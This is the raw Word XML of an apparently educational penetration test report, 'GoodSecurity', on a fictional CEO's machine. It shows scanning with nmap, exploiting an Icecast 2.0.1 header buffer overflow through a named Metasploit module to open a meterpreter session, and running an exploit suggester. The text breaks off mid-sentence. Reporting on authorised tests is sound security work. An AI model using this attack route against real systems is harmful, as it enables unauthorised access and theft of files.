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B3E4" w14:textId="5A8176C4" w:rsidR="00F405DA" w:rsidRDefault="00E92F1F" w:rsidP="00A734A3">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33B618D7" w14:textId="2A2277DC" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3">
      <w:pPr>
        <w:pStyle w:val="Title"/>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GoodSecurity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> Penetration Test Report </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46546001" w14:textId="2DF3DA49" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3"/>
    <w:p w14:paraId="5205D07F" w14:textId="47C26EF4" w:rsidR="00A734A3" w:rsidRPr="00BC4C7A" w:rsidRDefault="00A626CC" w:rsidP="00BC4C7A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId5" w:history="1">
        <w:r w:rsidRPr="005B645E">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:sz w:val="36"/>
            <w:szCs w:val="36"/>
          </w:rPr>
          <w:t>AlexSalvucci@GoodSecurity.com</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="41AD3B53" w14:textId="77777777" w:rsidR="00BC4C7A" w:rsidRPr="00BC4C7A" w:rsidRDefault="00BC4C7A" w:rsidP="00BC4C7A">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="12F12E20" w14:textId="199FCED4" w:rsidR="00A734A3" w:rsidRPr="00BC4C7A" w:rsidRDefault="00A626CC" w:rsidP="00A734A3">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
        </w:rPr>
        <w:t>4/30/2022</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D2A10A" w14:textId="5378E5D5" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6015F71E" w14:textId="45B61277" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="74EF2D87" w14:textId="16B28D21" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5ADCF2D8" w14:textId="695D29B9" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="36169592" w14:textId="1B74C314" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="696CA337" w14:textId="07BE63BA" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="2E049BE1" w14:textId="01DCE141" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="11BA3E47" w14:textId="30F3DE19" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="169C2752" w14:textId="7F9D3E24" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4E65E49C" w14:textId="3600267D" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3ED15FE1" w14:textId="015805BF" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="28E11D0C" w14:textId="5F2412BA" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05EF45D9" w14:textId="47575093" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7BBB00D3" w14:textId="501B8E4B" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4C2EC5F6" w14:textId="396D4BBB" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="30FF04D9" w14:textId="4269D059" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="706AC62A" w14:textId="4B411F4F" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C5B02D3" w14:textId="6A882C6B" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="051D07ED" w14:textId="45C5B6A9" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4CFD47A3" w14:textId="2BB214AE" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0899EA00" w14:textId="6CBA5309" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>High-Level Summary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E2F0406" w14:textId="77777777" w:rsidR="00A734A3" w:rsidRPr="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3"/>
    <w:p w14:paraId="642B3BCA" w14:textId="04B5F739" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GoodSecurity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> was tasked with performing an internal penetration test on GoodCorp’s CEO, Hans Gruber. An internal penetration test is a dedicated attack against internally connected systems. The focus of this test is to perform attacks, </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>similar to</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> those of a hacker and attempt to infiltrate Hans’ computer and determine if it is at risk. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GoodSecurity’s</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> overall objective was to exploit any vulnerable software and find the secret recipe file on Hans’ computer, while reporting the findings back to GoodCorp.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="147A956C" w14:textId="6906BDB7" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3">
      <w:pPr>
        <w:spacing w:line="480" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:t>When performing the internal penetration test, there were several alarming vulnerabilities that were</w:t>
      </w:r>
      <w:r w:rsidR="00494555">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">identified on Hans’ desktop. When performing the attacks, </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>GoodSecurity</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> was able to gain access to his machine and find the secret recipe file by exploit </w:t>
      </w:r>
      <w:r w:rsidR="005D3306">
        <w:t>a</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> program that had </w:t>
      </w:r>
      <w:r w:rsidR="005D3306">
        <w:t xml:space="preserve">a </w:t>
      </w:r>
      <w:r>
        <w:t>major vulnerabilit</w:t>
      </w:r>
      <w:r w:rsidR="00E92F1F">
        <w:t>y</w:t>
      </w:r>
      <w:r>
        <w:t>. The details of the attack can be found in the ‘Findings’ category.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73822325" w14:textId="628B3C6C" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3"/>
    <w:p w14:paraId="1299F05A" w14:textId="36A65C80" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3"/>
    <w:p w14:paraId="27376FFF" w14:textId="14D046C8" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3"/>
    <w:p w14:paraId="15382287" w14:textId="25914D8A" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3"/>
    <w:p w14:paraId="52587F53" w14:textId="77777777" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3"/>
    <w:p w14:paraId="2C21675F" w14:textId="18876FAC" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3"/>
    <w:p w14:paraId="1ED3C9E4" w14:textId="3DF4F058" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3"/>
    <w:p w14:paraId="78B52280" w14:textId="57F99417" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3"/>
    <w:p w14:paraId="1CB31F7B" w14:textId="1ECB8575" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3"/>
    <w:p w14:paraId="00CB8FD5" w14:textId="1C5985F2" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3"/>
    <w:p w14:paraId="317444CC" w14:textId="548007B5" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3"/>
    <w:p w14:paraId="4EB498C9" w14:textId="01563A14" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3"/>
    <w:p w14:paraId="63FEC9AF" w14:textId="408C3629" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3"/>
    <w:p w14:paraId="5E06A44D" w14:textId="5BBF5CED" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3"/>
    <w:p w14:paraId="575CE835" w14:textId="0756DD93" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
      </w:pPr>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>Findings</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="329488F5" w14:textId="09EE82A4" w:rsidR="00A734A3" w:rsidRDefault="00A734A3" w:rsidP="00A734A3"/>
    <w:p w14:paraId="0AC9E7AE" w14:textId="4D769C54" w:rsidR="009F589A" w:rsidRPr="009F589A" w:rsidRDefault="00740B0C" w:rsidP="00A734A3">
      <w:pPr>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Main vulnerability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E167CDC" w14:textId="5A299957" w:rsidR="00A734A3" w:rsidRPr="003749F2" w:rsidRDefault="00484430" w:rsidP="00A734A3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003749F2">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Machine IP:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B89D0C2" w14:textId="77777777" w:rsidR="00A626CC" w:rsidRPr="00355622" w:rsidRDefault="00A626CC" w:rsidP="003749F2">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00355622">
        <w:rPr>
          <w:rFonts w:cstheme="minorHAnsi"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>192.168.0.20</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4760934F" w14:textId="20496A90" w:rsidR="00484430" w:rsidRPr="003749F2" w:rsidRDefault="00484430" w:rsidP="00A734A3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003749F2">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Hostname:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="139F1D09" w14:textId="3788FAC6" w:rsidR="00484430" w:rsidRPr="003749F2" w:rsidRDefault="003F748E" w:rsidP="00355622">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003749F2">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>MSEDGEWIN10</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B80E0AE" w14:textId="413E0DCC" w:rsidR="00484430" w:rsidRPr="003749F2" w:rsidRDefault="00484430" w:rsidP="00A734A3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003749F2">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Vulnerability Exploited:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18E15981" w14:textId="77777777" w:rsidR="00A72DBF" w:rsidRDefault="003749F2" w:rsidP="00355622">
      <w:pPr>
        <w:ind w:firstLine="720"/>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003749F2">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Icecast 2.0.1 (Windows x86) - Header Overwrite</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C7339D6" w14:textId="62907B5F" w:rsidR="008E387A" w:rsidRDefault="008E387A" w:rsidP="0035562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Located </w:t>
      </w:r>
      <w:r w:rsidR="00A5733F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>at</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> metasploit’s </w:t>
      </w:r>
      <w:r w:rsidR="00A5733F">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>/exploit/windows/http/icecast_header</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46FD1EC4" w14:textId="39EBC7CE" w:rsidR="00484430" w:rsidRDefault="00484430" w:rsidP="00A72DBF">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003749F2">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Vulnerability Explanation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19F945DF" w14:textId="660CC709" w:rsidR="00EB655B" w:rsidRPr="003749F2" w:rsidRDefault="00EB655B" w:rsidP="00A72D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vulnerability is an issue with </w:t>
      </w:r>
      <w:r w:rsidR="00E70100">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">a buffer overflow in </w:t>
      </w:r>
      <w:r w:rsidR="00C52215">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>I</w:t>
      </w:r>
      <w:r w:rsidR="00E70100">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>cecast</w:t>
      </w:r>
      <w:r w:rsidR="00660FED">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> version </w:t>
      </w:r>
      <w:r w:rsidR="00127BB5">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>2.0.1.</w:t>
      </w:r>
      <w:r w:rsidR="00C52215">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> If Icecast receives 32 </w:t>
      </w:r>
      <w:r w:rsidR="00D1714B">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">HTTP headers, </w:t>
      </w:r>
      <w:r w:rsidR="00005741">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>a write will occur past the end of a specific pointer array. This allows an attacker to execute malicious code</w:t>
      </w:r>
      <w:r w:rsidR="004443C3">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, including code that can grant them access</w:t>
      </w:r>
      <w:r w:rsidR="00D819D7">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> or open a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00D819D7">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00D819D7">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidR="00D819D7">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>session.</w:t>
      </w:r>
      <w:r w:rsidR="004443C3">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="7DDD7CC5" w14:textId="785581AB" w:rsidR="00484430" w:rsidRPr="003749F2" w:rsidRDefault="00484430" w:rsidP="00A734A3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003749F2">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Severity:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2319502D" w14:textId="24137851" w:rsidR="00484430" w:rsidRPr="003749F2" w:rsidRDefault="00EC6924" w:rsidP="00343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A77A14">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">vulnerability is severe. </w:t>
      </w:r>
      <w:r w:rsidR="00541DCB">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Through it, an attacker can search through</w:t>
      </w:r>
      <w:r w:rsidR="00454438">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, change</w:t>
      </w:r>
      <w:r w:rsidR="00CD4283">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> and download confidential files, as well as access a shell on the </w:t>
      </w:r>
      <w:r w:rsidR="001970EF">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>victim</w:t>
      </w:r>
      <w:r w:rsidR="00CD4283">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> computer.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E8A68A" w14:textId="5C8F1772" w:rsidR="00484430" w:rsidRDefault="00484430" w:rsidP="00A734A3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="003749F2">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Proof of Concept:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B0A7FB4" w14:textId="78834CB9" w:rsidR="00020EF0" w:rsidRDefault="00B7585C" w:rsidP="00343363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10A627" wp14:editId="4FEB52C7">
            <wp:simplePos x="0" y="0"/>
            <wp:positionH relativeFrom="margin">
              <wp:posOffset>9525</wp:posOffset>
            </wp:positionH>
            <wp:positionV relativeFrom="margin">
              <wp:posOffset>5934075</wp:posOffset>
            </wp:positionV>
            <wp:extent cx="5419725" cy="2818130"/>
            <wp:effectExtent l="0" t="0" r="9525" b="127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EF0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Using </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00020EF0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00020EF0">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, I found that </w:t>
      </w:r>
      <w:r w:rsidR="00B21867">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>the machine was using Icecast 2.0.1</w:t>
      </w:r>
      <w:r w:rsidR="00343363">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, which is vulnerable to the buffer overflow</w:t>
      </w:r>
      <w:r w:rsidR="00454438">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> above.</w:t>
      </w:r>
      <w:r w:rsidR="007B656A">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> After that, </w:t>
      </w:r>
      <w:r w:rsidR="00B5044C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">I simply ran metasploit’s script to for that exploit to open a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidR="00B5044C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="00B5044C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> session on</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> the target machine. </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73F510EB" w14:textId="03E0AB06" w:rsidR="00074ED1" w:rsidRDefault="00074ED1" w:rsidP="00A734A3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="728315ED" w14:textId="77777777" w:rsidR="00740B0C" w:rsidRDefault="00740B0C" w:rsidP="00A734A3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="05F6F82D" w14:textId="77777777" w:rsidR="00740B0C" w:rsidRDefault="00740B0C" w:rsidP="00A734A3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="618743DD" w14:textId="77777777" w:rsidR="00740B0C" w:rsidRDefault="00740B0C" w:rsidP="00A734A3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3D0DEFF7" w14:textId="77777777" w:rsidR="00740B0C" w:rsidRDefault="00740B0C" w:rsidP="00A734A3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E3519EA" w14:textId="77777777" w:rsidR="00740B0C" w:rsidRDefault="00740B0C" w:rsidP="00A734A3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7E650C50" w14:textId="77777777" w:rsidR="00740B0C" w:rsidRDefault="00740B0C" w:rsidP="00A734A3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7175D3B2" w14:textId="710C617D" w:rsidR="00740B0C" w:rsidRDefault="00740B0C" w:rsidP="00A734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="005B492C">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> potential</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerabilities:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48D377B0" w14:textId="77777777" w:rsidR="001E632D" w:rsidRDefault="007108B2" w:rsidP="00A734A3">
      <w:pPr>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
        <w:t>While connected to the laptop,</w:t>
      </w:r>
      <w:r w:rsidR="00776929">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> I ran </w:t>
      </w:r>
      <w:r w:rsidR="00776929" w:rsidRPr="00B2651C">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">Meterpreter's local exploit suggester </w:t>
      </w:r>
      <w:r w:rsidR="00776929">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>to search for other potential vulnerabilities. This suggested two potential vulnerabilities</w:t>
      </w:r>
      <w:r w:rsidR="009A6D52">
        <w:rPr>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
